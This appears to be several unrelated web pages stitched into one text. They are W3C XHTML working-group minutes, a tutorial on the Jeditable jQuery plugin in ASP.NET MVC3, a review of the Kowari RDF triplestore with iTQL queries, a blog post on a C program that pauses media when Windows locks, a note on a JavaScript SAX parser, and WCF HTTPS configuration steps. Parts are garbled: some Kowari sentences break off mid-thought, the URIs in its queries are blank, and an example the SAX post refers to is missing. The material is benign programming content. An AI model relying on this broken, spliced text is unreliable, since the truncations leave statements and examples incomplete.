RM: a module such as XML Events and XML Handlers are for incorporation into 1.3 if wanted and XHTML2 if wanted -- is that true?
...
like to think it is true, but may never be true statement depending on what happens with XHTML2
... developing XML Events 2 reusable in both existing m12n scheme and XHTML2
SP: yes, for both, XForms is planning on importing events 2
RM: nothing more in XHTML2 than incorporates XML Events 2 and XHML Handlers 2
... Access, Role, etc. only in XHTML2 by reference
SM: ok
... dependent on modules - long pole in tent Access or Events 2
RM: implementations for XHTML2 will be needed, too
... Script module in there, too - pull that into XHTML2 and add @implements
SP: issue new WD next month?
RM: before christmas moritorium
SP: relationship to referenced documents
RM: in LC
SP: early next year for LC would be good target
SP: when
RM: february ok
SP: pretty far advanced - things don't have implementations for in XHTML2 (frames replacement stuff) and @src and @href everywhere; alessio helping on all those fronts
... implementation of features demonstration in good shape
SM: what version of XForms including?
SP: anticipating XForms 1.1
SM: XML Events 2, too?
SP: yes
SM: can't imagine get too far without test suite
<alessio> surely gregory
SP: once go to LC, major work will be producing test suite
SM: had one of my guys take existing XHTML test suite and start readying for change to XHTML2 - should i have him continue?
SP: yes
SM: if can take advantage of that work will help us along
SP: anything else?
RM: talked about docs individually - resolved to go to CR and PER on docs;
... XHTML2 separate into separate specs at later date?
MOVE TO ADJOURN
RM: bangs gavel - MEETING ADJOURNED
SM: meet next wednesday?
SP: call starts while still at airport
GJR: US Daylight savings time ends this weekend
SM: if have any cycles to work on transition requests for PERs i probably have the time
SP: long ago, we said to anne van kestren that we would change IDREF on imagemaps when re-issued 1.1
... should make sure we should do that
SM: where 1.2 or 2?
RM: 1.2
SM: override def of module for m12n - not update m12n because then break all other languages
<ShaneM> ACTION: Shane add the IDREF change for imagemap to XHTML 1.2 [recorded in]
<trackbot> Created ACTION-16 - Add the IDREF change for imagemap to XHTML 1.2 [on Shane McCarron - due 2008-10-31].
ADJOURNED
<Steven> thanks Alessio
Scribes: oeddie, oedipus_laptop, oedipus
Present: Alessio, Charlie, Gregory, Nick, Raman, Roland, Shane, ShaneM, Steven, Uli, oedipus, Masataka_Yakura (remote), Gregory_Rosmaita
Regrets: MarkB, Tina
Date: 24 Oct 2008
http://www.w3.org/2008/10/24-xhtml-minutes.html
You have probably seen the HTML5 feature called contenteditable. It enables you to edit any element in HTML using an inline editor. The only thing you need to do is attach event handlers that are called when editing is finished and send the new content to the server side. If you like this HTML5 feature, you will love this plug-in. Although contenteditable is nice to have, if you have tried to use it in your web applications, you have probably noticed that you still need to implement a lot of other functionality, such as sending AJAX requests to the server side, handling errors, validation, etc. Also, it works well for plain text, but if you want to use some other editor, such as a calendar, check box, or select list, where you don't want the user to type arbitrary text, you will see that regular contenteditable is not sufficient. In this article, I will show you a jQuery alternative to contenteditable - the Jeditable plug-in - and explain how you can implement inline editing functionality in an ASP.NET MVC3 application using jQuery.

The Jeditable plug-in enables you to create a click-and-edit field as shown in the following figure: on the left side is a simple HTML page, and on the right side is the same page after you click on the text. The text is replaced with a text area, and two buttons for save and cancel are generated. When you finish editing and click the OK button, the text in the text area is posted to the server page, and the new text is placed instead of the old one. You can see this in the live examples on the Jeditable demo site. The Jeditable plug-in can be easily customized (e.g., to use a text input or a select list instead of a text area, change style/behavior, etc.), as explained in the rest of the article. The demo page with custom examples shows various examples with different editor types.
Also, it will handle communication with the server-side page for you. The Jeditable plugin is a very useful plugin that enables inline editing of HTML. With it, you can let users of your application simply click on the element they want to change and modify it immediately, without a separate edit form. The idea behind the Jeditable plugin is to replace static elements with an appropriate form element where the user can edit the content and submit it to the server side. As an example, let us assume that you have placed a static HTML element in the page - something like the following HTML code:

<span id="txtUser">John Doe</span>

This is a plain text field. You can enable the user to click on this field and edit it using the following JavaScript call:

$("#txtUser").editable("/ServerSide/Update");

Each time the user clicks on the element with the ID txtUser, the Jeditable plugin will convert this element to a text box, put the content of the element in the text box value, and post the new value to the /ServerSide/Update URL via an AJAX call when the user presses Enter. If the value is successfully saved on the server side, the Jeditable plugin will replace the old value of the element with the new one. The Jeditable plugin handles all interaction in the user interface; the only things you need to do are configure the plugin and implement the server-side logic that handles the changed values. In this article I will explain how to use the Jeditable plugin in an ASP.NET MVC3 application. The following sections describe the model, view, and controller used in the example.

This example uses a simple model representing a company.
The source code for the model class is shown in the following listing:

public class Company
{
    public int ID { get; set; }
    public string Name { get; set; }
    public string Address { get; set; }
    public string Town { get; set; }
}

The view is a standard Razor page that displays details about the company:

@model JQueryMVCEditable.Models.Company
@{
    Layout = "~/Views/Shared/_Layout.cshtml";
}
<h2>Details</h2>
<fieldset>
    <legend>Company</legend>
    <input type="hidden" id="CompanyId" value="@Model.ID" />
    <div class="field">
        <div class="display-label" id="lblName">Name</div>
        <div class="display-field text" id="Name">@Model.Name</div>
    </div>
    <div class="field">
        <div class="display-label" id="lblAddress">Address</div>
        <div class="display-field textarea" id="Address">@Model.Address</div>
    </div>
    <div class="field">
        <div class="display-label" id="lblTown">Town</div>
        <div class="display-field select" id="Town">@Model.Town</div>
    </div>
</fieldset>

The basic function of the controller is to get the company object (model) and provide it to the view. The code for showing details about the company is shown in the following listing:

public class CompanyController : Controller
{
    public ActionResult Details()
    {
        ...
    }
}

In order to show the company details, you need to enter the URL /Company/Details. There are two other methods in the controller that accept AJAX calls from the Jeditable plug-in (these are described below). Once you run this code, you will get the standard details page as shown on the following figure. You might notice that this is a standard, unstyled MVC details page generated by Visual Studio. It contains a fieldset with the legend "Company", where I have placed the three company fields (name, address, and town) with labels. In the next sections I will show you how you can convert this static view into fully editable elements and implement inline editing functionality in the details page.
In the first example, we will make the labels editable so the user can change them directly on the page. In the page, each input field has its own label, such as:

<div class="display-label" id="lblName">Name</div>

I have placed a display-label class on each div that represents a label, and I will use this class to make the labels editable. The jQuery code that applies the Jeditable plugin to the labels is shown in the following listing:

$(".display-label").editable("/Company/UpdateLabel");

Each time you click on a label, it is converted to a text input where the user can enter a new value for the label. This is shown on the following figure: clicking on the label "Name" converts it into a text input. When the user presses the Enter key, the new value of the label is sent to the /Company/UpdateLabel server-side page. Two values are sent in the request: id (the ID of the edited element) and value (the new text). An example of such a request is shown on the following figure. On the server side, add a controller with an action method that is called when the /Company/UpdateLabel request is sent. An example of the controller and action method is shown in the following listing:

public class CompanyController : Controller
{
    public string UpdateLabel(string id, string value)
    {
        return value;
    }
}

This action method accepts the ID of the label and the new value. Specific code for updating the label value in the database or configuration files is omitted because it is application specific and not directly related to the plug-in.

We can also make the field values editable. Let us assume that we have placed the ID of the current company in a hidden field with the ID CompanyId, and that each field value is placed in a div with the class display-field. Part of the HTML is shown in the following code:

<input type="hidden" id="CompanyId" value="@Model.ID" />
...
<div class="display-field text" id="Name">@Model.Name</div>
...
<div class="display-field text" id="Address">@Model.Address</div>
...
<div class="display-field text" id="Town">@Model.Town</div>

We will assume that each field that should be editable has the class "display-field". The jQuery code that applies the Jeditable plugin to the editable fields is shown in the following listing:

$(".display-field").editable("/Company/UpdateField", {
    submitdata: {
        CompanyId: function() { return $("#CompanyId").val(); },
        RecordType: "COMPANY"
    }
});

Each time you click on an element with the class display-field, it is converted to a text input as shown on the following figure. When the user presses Enter, the new value of the element is sent to the server-side page /Company/UpdateField. Four values are sent in the request: id, value, CompanyId, and RecordType. As you can see, the code is very similar to the previous code, with a difference in the two additional submitdata parameters, CompanyId and RecordType. As we are editing particular companies and not global labels, we need to know on the server side the ID of the company whose field value is being changed. I have placed the ID of the company in the hidden field with the ID CompanyId, and the Jeditable plug-in takes this value and adds it to the request parameters when the request is submitted. Also, sometimes we need to know on the server side whether we are editing companies, jobs, people, products, etc. Therefore, it is useful to have an additional parameter that sends information about the type of the record being edited. In this example, this is achieved using the second custom submitdata parameter, called RecordType. The server-side page can check the value of this parameter and update either a company, job, product, etc. In this simplest example we have only companies, so this parameter is not used. As an alternative, you can use different URLs for different record types (e.g., '/Company/UpdateField', '/Product/UpdateField', '/Job/UpdateField', etc.)
if you do not want to have an additional parameter. A trace of the AJAX call that is sent to the server side is shown on the following figure. On the server side, add a controller with an action method that is called when the /Company/UpdateField request is sent. An example of the controller and action method is shown in the following listing:

public class CompanyController : Controller
{
    public string UpdateField(string id, string value, int CompanyId, string RecordType)
    {
        return value;
    }
}

This action method accepts the ID of the field, the new value, the ID of the company, and the type of the record we are editing. Specific code for updating the company field value in the database is omitted because it is application specific and not directly related to the plugin.

The default functionality can easily be changed by setting different options in the plugin initialization call. Options are set as the second parameter of the Jeditable call. This section shows the different options that can be applied. By default, clicking on the element initiates the Jeditable plugin, and pressing the Enter key is treated as accepting the changes. Losing focus from the element (blur) or pressing the ESC key is treated as a cancel action. You can change these options and add separate buttons for the accept and cancel actions, which will be injected beside the text input. In order to configure the submit and cancel buttons, set these parameters in the initialization:

$(".editable-field").editable("/Company/UpdateField", {
    cancel: 'Cancel',
    submit: 'OK'
});

If the cancel and submit parameters are not set, the buttons are not generated. The text box is the default editor; however, you can use a text area or a select list as an alternative editor.
In order to use a text area instead of a text input, you just change the value of the type parameter, as shown in the following example:

$(".textarea").editable("/Company/UpdateField", {
    type: 'textarea',
    rows: 4,
    columns: 10,
    cancel: 'Cancel',
    submit: 'OK'
});

Note that when you use the text area input, you should add a submit button, because in a textarea the Enter key adds a new line, so it cannot be used for submitting the value. The editor configured as a text area is shown on the following figure. Another editor type is a select list, where you define a set of options that may be selected. An example is shown in the following listing:

$(".select").editable("/Company/UpdateField", {
    type: 'select',
    data: "{'Belgrade':'Belgrade','Paris':'Paris','London':'London','selected':'Belgrade'}"
});

In this example, a select list containing three values is generated. Note that the last parameter tells the Jeditable plugin which value should be selected. Instead of hardcoding the values in the data parameter, you can load the options from a server-side URL:

$(".remote-select").editable("/Company/UpdateField", {
    type: 'select',
    loadurl: '/Company/Options',
    loadtype: 'GET',
    loaddata: {type: "1"}
});

When the user clicks on the element, a /Company/Options?type=1 request is sent to the server side using the GET method. The returned values are used as the options in the select list. A select list editor is shown on the following figure. Text box, text area, and select list are the standard editors, but there are other custom types such as checkbox, datepicker, file upload, time editor, etc. Some of them are shown on the Jeditable demo page. If you cannot find the editor type you need, you can create your own editor - see this tutorial for more details. By default, the Jeditable plug-in sends the ID of the element and the value that is entered in the input element to the server-side URL.
However, you can customize these settings, as shown in the following example:

$("#txtTitle").editable("/Company/UpdateField", {
    id: 'COMPANY_FIELD',
    name: 'FIELD_VALUE',
    method: 'POST',
    submitdata: {type: "company"}
});

Here, id sets the name of the request parameter that carries the element ID, name sets the name of the parameter that carries the entered value, and method sets the HTTP method used. When Jeditable submits a request to the server side, the POST request will look like /Company/UpdateField?COMPANY_FIELD=Name&FIELD_VALUE=TEST&type=company. As you can see, the id and value parameters have different names, the value is encoded, and a new parameter called type is added to the request.

The way the editable plugin is activated can also be set in the configuration. This is configured using the event and onblur parameters:

$("#txtTitle").editable("/Company/UpdateField", {
    event: 'click',
    onblur: 'submit'
});

The event parameter is a jQuery event that converts the content to an editable input (e.g., 'click', 'dblclick', or 'mouseover'). The onblur parameter can have one of the values 'cancel', 'submit', or 'ignore', or can be set to a function; it defines what the plugin does when the input loses focus.

You can also change the way Jeditable is displayed. You can set the style or associate a CSS class with the form where the inline editor is placed. If you use the value 'inherit', the class or style from the surrounding element is applied to the form. Also, you can define the width and height of the editor. An example is shown in the following listing:

$("#txtTitle").editable("/Company/UpdateField", {
    cssclass: 'inherit',
    style: 'display:inline',
    height: '20px',
    width: '100px'
});

In this configuration, the CSS class is inherited from the surrounding element, the form is displayed inline, and the dimensions of the textbox are 20x100px.
You can also define what text will be shown if a current value does not exist, what will be used as the tooltip text, and what text/HTML will be shown while the server is saving the edited value:

$("#txtTitle").editable("/Company/UpdateField", {
    placeholder : 'N/A',
    tooltip     : 'Click to edit',
    indicator   : 'Saving...',
    select      : true,
    data        : function(value, settings) {
                      return encode(value);
                  }
});

In this example, if the element does not have any content, 'N/A' will be displayed (the default value is 'Click to edit'), and the tooltip will be 'Click to edit'. While the plugin waits for the answer from the server, the text 'Saving...' will be displayed; you can use HTML instead of plain text if you want. Once the user starts editing, the text will be automatically highlighted because the select property is set to true. The data parameter represents the data that will be shown in the editor. In the previous example with the select editor type, the data element held the list of options placed in the select list. If you set a function as the data parameter, it will be called before Jeditable takes the current text from the element; the current text is passed to the function, and the returned value is set as the content of the editor element. It can be either a string or a function returning a string. This can be useful when you need to alter the text before editing (e.g., encode it, as shown in the example). Many events can be handled in the Jeditable plug-in - for example the onsubmit, onreset, and onerror callbacks, each of which receives the plugin settings and the original element (available as this).

The beauty of the Jeditable plugin is the fact that it can be applied on top of any other plugin. As an example, you can apply inline cell editing in table cells, edit nodes in a tree view or in a menu, edit the content of tabs, etc. The only thing you need to do is apply the Jeditable plugin on the elements that should be edited. In the following examples you will find two usages of the editable plugin, with tabs and with tables.
jQuery UI Tabs is a part of the jQuery UI library and enables you to easily create a tabbed interface. You can find various usage examples on the jQuery UI Tabs page. An example of a tabbed interface is shown in the following figure:

Each tab in the picture is a link in the format <a href="#tab-1">Nunc tincidunt</a>, <a href="#tab-2">Proin dolor</a>, <a href="#tab-3">Aenean lacinia</a>, where tab-1, tab-2, and tab-3 are the ids of the tab contents. You can apply the editable plugin on the tab links using the following code:

$("#tabs").tabs();
$("a[href='#tabs-1']").editable("/Settings/UpdateTabLabel", {
    event      : "dblclick",
    submitdata : { id: "tab-1" }
});

A similar script can be applied to make the other tabs editable.

The jQuery DataTables plugin adds pagination, filtering, and sorting to a table. Once you apply the DataTables plugin, you can apply the editable plugin on the cells. In the following figure, you can see how the Jeditable plugin can be applied on the table cells:

In this example the jQuery DataTables plug-in is applied on the table, and then Jeditable is applied to the individual cells. The script that applies the editable plugin on the table cells is simple:

$("table#mycompanies td").editable("/Company/UpdateTableCell");

As long as each cell has its own id, the Jeditable plugin will work. A better solution would be to avoid ids on each cell and send just the id of the row and the column together with the value. In that case you might take a look at the already prepared solution for applying the editable plugin on a DataTable on the DataTables site, or at the DataTables Editable plugin that combines the features of the DataTables and Jeditable plugins. You can see more details about creating an inline editable cell in the ASP.NET MVC Editable Table[^] article. In this article I have shown the basic concepts of implementing an inline editor in MVC3, as well as various configuration options.
If you have any questions about the Jeditable plug-in or you need more info about the way it is used, please take a look at the Jeditable site, where you will find complete documentation with live examples. Attached is the source code, a Web Developer 2010 project implementing a simple page that contains the examples described in this article.
http://www.codeproject.com/Articles/265211/Using-JEditable-plugin-as-ASP-NET-MVC3-jQuery-inli?fid=1657030&df=90&mpp=25&sort=Position&spc=Relaxed&tid=4057693
Kowari is named for a small, mouselike Australian mammal, but given that the full version of the software is. Below, we'll use that console interface to create a database, populate it with an RDF file that describes United States senators, and query that data. A sample chunk of our RDF: <USSenator rdf: <Name>Lieberman, Joseph</Name> <Party>Democrat</Party> <State>CT</State> <URI></URI> </USSenator> First, we create a database on localhost (127.0.0.1) named "Senators". Kowari uses Java RMI URIs to identify databases. iTQL> create <rmi://127.0.0.1/server1#Senators>; Our next command will load senators.rdf into that just-created database. iTQL> load <> into <rmi://127.0.0.1/server1#Senators>; Kowari allows for aliases to be declared and used in a way akin to namespaces. iTQL> alias <> as ex; iTQL> alias <> as kowari; That first alias allows us to abbreviate the namespace of our senatorial RDF in all further queries. The second alias is a convenience abbreviation for the "is" equivalency operator built into Kowari, which we'll use below. Now that we're initiated, propagated, and aliased, we can query the triplestore. The query below selects all senators and their party affiliations. iTQL> select $subj $obj from <rmi://127.0.0.1/server1#Senators> where $subj <ex:Party> $obj; Here's what's happening: the "where" clause in the select statement defines constraints on the triplestore. In the example above, our "where" clause asks for all triples that have a predicate equal to ex:Party (which is an alias for). The output of the query above is a list of the 100 URIs making up the Senate, and their party affiliations: [, "Democrat" ] [, "Democrat" ] [, "Democrat" ] [, "Democrat" ] ... What if we only want to list Democrats? Using Kowari's built-in equivalency operator, <kowari:is> (aliased above), we can match string literal values.
iTQL> select $subj $obj from <rmi://127.0.0.1/server1#Senators> where $subj <ex:Party> $obj and ($obj <kowari:is> 'Democrat'); Now we'll use more than one constraint in the where clause, and return more columns in our results. The query below names the different kinds of subjects and objects we expect, in order to allow us to list the name, web address (URI), and party affiliations for the senators from Connecticut (CT). iTQL> select $name $uri $party from <rmi://127.0.0.1/server1#Senators> where $senator <ex:Name> $name and $senator <ex:URI> $uri and $senator <ex:Party> $party and $senator <ex:State> $state and $state <kowari:is> 'CT' order by $name; Our output: [ "Dodd, Christopher", "", "Democrat" ] [ "Lieberman, Joseph", "", "Democrat" ] And one final example: iTQL> create <rmi://127.0.0.1/server1#feeds>; iTQL> load <> into <rmi://127.0.0.1/server1#feeds>; iTQL> select $uri $title from <rmi://127.0.0.1/server1#feeds> where $uri <> $title; The code above creates a database called "feeds", populates it with the most recent site summary XML from O'Reilly/XML.com and then, in response to a query, lists the URIs and titles of each article - that is, the bare bones of a queryable RSS aggregator in a few lines of iTQL. As shown above, iTQL's syntax looks quite a bit like SQL and is clearly intended to make transitioning to Kowari as simple as possible for DBAs. XML hackers used to the brevity of XPath might be less accepting, however. The iTQL console is one of several interfaces to the server. Access methods exist for JSP, SOAP, a JDBC driver, as well as for an iTQL JavaBean and Kowari's own low-level driver interface. Three other features worth noting are Lucene full-text integration, descriptors, and named graphs. Lucene full-text integration. RDF is not simply triples made up of URIs; in practice, much RDF (as in the examples above) contains string literal or XML data. Kowari can use the open source Lucene search engine to index this text.
To use Lucene indexing, the DBA creates a separate database using the Lucene "model". Queries can then be constrained by the results returned from a Lucene search. In practice, this allows for searches that keep track of the source of a given token within a graph. In simple English, Lucene integration allows queries like: "select all articles where the title includes the words 'hacking' and 'library'," or "show me the publication dates of all books that contain the word 'Texas'." Lucene allows for basic keyword lookups as well as complex queries, including fuzzy matching and wildcards, and its presence in the database provides Kowari users with an appealing combination of Semantic Web-style, graph-based querying with old-school text lookups. Descriptors. Descriptors bind iTQL commands to XSLT variables. Using descriptors, a developer can create an XSLT template and then populate it, dynamically, with values fetched from an iTQL query. This feature will be of particular interest to web developers who want to create custom, navigable web interfaces above large RDF stores, along with anyone who wants to convert RDF data into legacy XML formats. (Descriptors are not included in Kowari Lite.) Named graphs. One problem that frequently comes up in the RDF community is the "provenance" problem -- how do we know, in a large triplestore, where a given triple comes from? Many have suggested named graphs as a solution, which will turn triples into "quads". Kowari has taken this path. According to Tom Adams, "Our triplestore is really a quad store, the 4th tuple being the group/model that a triple belongs to." Kowari is written in Java 1.4.2 and uses that version's New I/O (NIO). This provides for a decrease in access times, as Kowari is able to bypass the need for a storage layer (such as BerkeleyDB or MySQL), and write data blocks directly to disk.
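The named-graph idea described above can be sketched in a few lines of JavaScript. This is a toy model for illustration only - it is not Kowari's storage format, and the helper names are invented:

```javascript
// Toy quad store: each statement keeps a fourth element naming the
// graph (model) it belongs to, so the provenance of any triple can be
// recovered. Illustrative only -- not Kowari's actual storage layer.
const quads = [];

function addQuad(subject, predicate, object, graph) {
  quads.push({ subject, predicate, object, graph });
}

// Which graphs contain this triple? This is the "provenance" query
// that plain triples cannot answer.
function provenance(subject, predicate, object) {
  return quads
    .filter(q => q.subject === subject && q.predicate === predicate && q.object === object)
    .map(q => q.graph);
}

addQuad('senator:lieberman', 'ex:Party', 'Democrat', 'rmi://127.0.0.1/server1#Senators');
console.log(provenance('senator:lieberman', 'ex:Party', 'Democrat'));
// -> ['rmi://127.0.0.1/server1#Senators']
```

The same triple asserted in two different graphs simply yields two quads, so both sources remain recoverable.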
Tucana has tested the 32-bit version of Kowari with 10 million statements, and the 64-bit with 50 million; TKS has been scaled up to 250 million statements and can conceivably manage a billion triples. Currently the software is used by a variety of clients, with applications in genomics research, defense integration, and automobile manufacturing, and the firm reports dramatically increased performance on graph queries over relational databases. While Kowari is capable of doing real work today, Tucana plans to continue adding features and to make the triplestore more standards compliant. Inferencing support via OWL is planned, and Tucana hopes to eventually support OWL DL, with stops at RDFS and "OWL Tiny" along the way. Support for arbitrary data types is also planned. Tucana is also developing a new approach to file addressing, which they call a "resolver". Resolvers allow any resource to be assigned a special "file://" URI, and allow for the processing of arbitrary files as "pseudo-RDF". For instance, a resolver that points to an MP3 file can automatically extract and store a description of the file based on the ID3 tags embedded in the MP3; the same could be done with JPEG files containing metadata. This approach seems particularly interesting because it provides a simple way to absorb the "ambient data" on a computer -- unstructured content like photo and MP3 directories -- into a database, where it can be searched and explored. Kowari is a solid tool created by an enthusiastic, knowledgeable team. That said, it. But DBAs looking to replicate the user/privileges model of MySQL or other databases may be disappointed by Kowari. These minor issues aside, Kowari works as promised. SQL users should find it easy to migrate their skills to iTQL.
Most commendably, in the open source tradition, the database has been designed to "play nice with others," allowing anyone who has invested their energies in building, for instance, a Jena solution to migrate to Kowari with minimum pain. Kowari should be a welcome addition to any Semantic Web developer's toolbox.
http://www.xml.com/pub/a/2004/06/23/kowari.html
If you've got music playing on your PC and then you lock the desktop, the music keeps playing. Sometimes this is what you want, and sometimes it's not… I was dogfooding the recent release of a certain media playing software not so long ago, which meant I had stuff playing more of the time than typical. One annoyance that kept bugging me was that I had to remember to pause the music player before locking (Win+L) the desktop, so as not to annoy while I was away from my desk (and to not miss the rest of an album). As far as I can tell, most music players keep on playing under a lock screen, which is the right thing in many cases, but not here… This was an itch I needed to scratch and, just for fun, I thought I'd write it in C (not even C++) to get away from all this new fangled object-oriented language stuff I've been doing recently. (Yes, I know, you can write OO in C, but you know what I mean). Just to make it more interesting, I decided not to use any of the standard C runtime libraries, and to make this application as small as I could without having to resort to assembler. Of course, all this meant that an hour's work took probably a day from start to finish! Given all that, there are two sections in this blog post: first, the one that actually addresses the problem I set out to address, namely getting the music player to stop playing; the second shorter part covers the tricks to make the application binary and running footprint small. To begin, we need to detect when a workstation is being locked (and unlocked, of course): WTSRegisterSessionNotification is the function to look at. After you call this, the window you designate will be sent messages when login sessions on the PC change state: we're interested in the lock and unlock notifications. The next part is to control the music player: I've been deliberately vague about which player I'm interested in (well, apart from that obvious link above), and that's because the technique I used works with most players.
Windows supports a WM_APPCOMMAND message type which, as the name suggests, is used to ferry “application level” messages to and from various applications, such as copy, paste, change volume and, as desired here, pause and play. (Incidentally, these types of message are what the additional keys on “multimedia” keyboards use to perform their functions.) Most modern media players recognise the app command messages for media control and respond appropriately, so all I’ve got to do is send those messages to the media player. How do I determine which window to send the messages to? A clever search based on window title or class? Nope, I just broadcast to all top level windows that happen to be running… Here’s my window procedure: LRESULT CALLBACK WndProc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam) { switch (msg) { case WM_CREATE: WTSRegisterSessionNotification(hwnd, NOTIFY_FOR_THIS_SESSION); /* Make it go very quiet... */ SetProcessWorkingSetSize( GetCurrentProcess(), (SIZE_T)-1, (SIZE_T)-1 ); break; case WM_DESTROY: WTSUnRegisterSessionNotification(hwnd); break; case WM_WTSSESSION_CHANGE: if (wParam == WTS_SESSION_LOCK || wParam == WTS_SESSION_UNLOCK) { int start = wParam == WTS_SESSION_UNLOCK; PostMessage(HWND_BROADCAST, WM_APPCOMMAND, 0, MAKELONG(0, start ? APPCOMMAND_MEDIA_PLAY : APPCOMMAND_MEDIA_PAUSE)); if(!start) PostMessage(HWND_TOPMOST, WM_SYSCOMMAND, SC_MONITORPOWER, 2); } break; } return DefWindowProc(hwnd, msg, wParam, lParam); } I register for session notifications in the WM_CREATE handler. I also reduce the working set (roughly speaking, working memory) at that point too, to let the system release any memory I might have used for initialisation (and that I won’t need to use again) – I suspect that really doesn’t make much difference these days, and I’ve been too lazy to actually measure its impact in any case. 
For tidiness, I unregister in the destroy handler – probably not necessary since the process is exiting at that point anyway, but I might as well be tidy! You can see in the WM_WTSESSION_CHANGE handler how I create the correct media control message and then broadcast it system wide. (Note that my flag is an int here, not a bool – remember, I said I was writing C, not C++.) In that handler too, when I detect a session lock, I send an additional message, a shut down monitor sys command message: this turns the monitor off, saving a little power. After all, if I’m locking the workstation, it’s probably because I’m wandering off, or at least not looking at the screen. I’m not going to bother to describe how to create the window for which this is the window procedure: that sort of thing is covered in many places, such as the venerable Windows programming books by Charles Petzold (I cut my Windows teeth on the 3.1 version of that book – how old does that make me feel?) – if someone really really does want the whole story, ask in the comments… Rather than have the window cluttering up the desktop, I never actually show it (after all, this application needs no UI to work), but I do create a notification area icon to remind me that it’s running, and to also give me a means of exiting the program without resorting to Task manager. Again, that’s covered in lots of places so I won’t describe it here: just do a search for Shell_NotifyIcon. One thing, however, that is very important and that few people who use notification area icons seem to neglect, is re-registering the icon when Windows Explorer restarts. Explorer doesn’t crash often (and, when it does, it’s mainly my fault because I’ve screwed up some Explorer add-in that I’m working on) but it is annoying to lose some notification area icons after a restart. 
What one should do is handle the taskbar created message: this doesn't have a WM_ constant definition, but instead the message number must be retrieved via RegisterWindowMessage, as in: UINT WM_TASKBAR_CREATED; ... WM_TASKBAR_CREATED = RegisterWindowMessage(_T("TaskbarCreated")); Then, in the window procedure, add a default case to check for this message: default: if (msg == WM_TASKBAR_CREATED) /* Do whatever you need to register the icon again */; break; (Because the message isn't a constant, you can't have a case specifically for it, so this is the best one can do.) Now, on to the second part, making the application small. By default, Visual Studio C(++) projects link with the standard libraries (sometimes known as the CRT). Since I'm not using anything at all from them, I can ignore them. If you look at the CRT source for how the WinMain function you define is called, you'll see that there's a "main" (actually several of them) within the CRT which set up heaps, debug support and a bunch of other things before calling WinMain. None of that is necessary here, apart from calling ExitProcess when my application wants to exit. (Heck, that might not even be necessary but, as with unregistering the session messages, it's probably good to be tidy.) I've replaced all of that with: void __cdecl Startup(void) { ExitProcess(Main(GetModuleHandle(NULL))); } where Main is my stripped down WinMain which takes only the program HINSTANCE – I don't care about any of the other parameters WinMain normally gets. My Main looks like: UINT Main(HINSTANCE hInstance) { MSG msg; HWND hwnd = Initialise(hInstance); /* Create my window and notification icon here */ if(!hwnd) return 0; /* Standard message loop */ while (GetMessage(&msg, NULL, 0, 0)) { TranslateMessage(&msg); DispatchMessage(&msg); } /* ... delete notification area icon here ...
*/ return (UINT)msg.wParam; /* Doesn't really achieve anything, but is the conventional return protocol */ } Next, you need to change the linker settings to invoke Startup instead of the default CRT initialisation call. After all of that, the binary is all of 9.5KB, about half of which is the notification area icon and version information, which is about as small as you can go these days, and a lot smaller than a typical "hello world" program which does link to the CRT. Completely pointless in these days of multi-GB RAM and TB disks, but it was fun.
https://blogs.msdn.microsoft.com/gsmyth/2011/10/02/shaddapayaface/
A SAX Parser Based on JavaScript's String.replace() Method? A native SAX implementation in JavaScript would for example let you grab data from RSS feeds over Ajax without loading the entire RSS document into a DOM tree. Or, assuming your XHTML was well-formed, it would let you rapidly query the current document. (Although it wouldn't be able to return references to existing DOM nodes.) (YMMV depending on what browser you use.) Try it out on this simple XML fragment: The SAX function looks like this: doSax(stringToParse,doStartTag,doEndTag,doAttribute,doText); The callback functions for this example are: function doStartTag(name){alert("opening tag: "+name);} function doEndTag(name){alert("closing tag: "+name);} function doAttribute(name,val){alert("attribute: "+name+'="'+val+'"');} function doText(str){ str=str.normalize(); if(!str){str='[whitespace]';} alert("encountered text node: "+str); } And here's the code: sax.js. I think that with a little work (i.e. the ability to handle namespaces, comments, and other declarations) this could potentially be usable--maybe not as a full-fledged SAX parser--but a quick and dirty utility for reading XML via Ajax. Hmm, a tag soup SAX-style parser might be nice to have too. Nice job! Posted by Jose on April 07, 2008 at 06:55 AM MDT
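To see how the callback style above is consumed, here is a minimal, self-contained sketch of a SAX-style scanner with the same callback signatures. To be clear, this is not the article's sax.js (which is built around String.replace()); it is a regex-driven illustration of the event/callback approach, and it handles only simple tags, attributes, and text - no namespaces, comments, or CDATA:

```javascript
// A toy SAX-style scanner in the spirit of the article's doSax():
// it walks the string with a regex and fires the same four callbacks.
// Illustrative only -- not the article's actual sax.js implementation.
function doSaxSketch(xml, onStart, onEnd, onAttr, onText) {
  // Alternatives: closing tag | opening tag (with attrs, maybe self-closing) | text
  const token = /<\/([\w:-]+)>|<([\w:-]+)((?:\s+[\w:-]+="[^"]*")*)\s*(\/?)>|([^<]+)/g;
  const attr = /([\w:-]+)="([^"]*)"/g;
  let m;
  while ((m = token.exec(xml)) !== null) {
    if (m[1]) {                       // closing tag
      onEnd(m[1]);
    } else if (m[2]) {                // opening tag
      onStart(m[2]);
      let a;
      while ((a = attr.exec(m[3])) !== null) onAttr(a[1], a[2]);
      if (m[4]) onEnd(m[2]);          // self-closing: fire end immediately
    } else if (m[5]) {                // text node
      onText(m[5]);
    }
  }
}

const events = [];
doSaxSketch('<item id="1">hi</item>',
  (n) => events.push('start:' + n),
  (n) => events.push('end:' + n),
  (k, v) => events.push('attr:' + k + '=' + v),
  (t) => events.push('text:' + t));
console.log(events.join(','));
// start:item,attr:id=1,text:hi,end:item
```

Because nothing is buffered except the current match, this style never builds a tree - which is exactly the property that makes SAX attractive for large RSS feeds.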
http://blogs.sun.com/greimer/entry/a_sax_parser_built_on
Introduction and Goals (from my site).

public class Service1 : IService1
{
    public string GetData(int value)
    {
        return string.Format("You entered: {0}", value);
    }

    public CompositeType GetDataUsingDataContract(CompositeType composite)
    {
        if (composite.BoolValue)
        {
            composite.StringValue += "Suffix";
        }
        return composite;
    }
}

We use the 'bindingConfiguration' tag to specify the binding name. We also need to specify the address where the service is hosted; please note the HTTPS in the address tag. Change 'mexHttpBinding' to 'mexHttpsBinding', and in 'serviceMetadata' change 'httpGetEnabled' to 'httpsGetEnabled'. Next, select 'Assign an existing certificate' from the wizard; you can see a list of certificates. The "compaq-jzp37md0" certificate is the one which we just created using 'makecert.exe'. Now try to test the site without 'https' and you will get an error as shown below… that means your certificate is working. Do not forget to enable IIS anonymous access.
http://www.c-sharpcorner.com/UploadFile/shivprasadk/7-simple-steps-to-enable-https-on-wcf-wshttp-bindings/
Created at 14:57 Sep 19, 2017 by greg.ercolano, last modified at 14:59 Sep 19, 2017

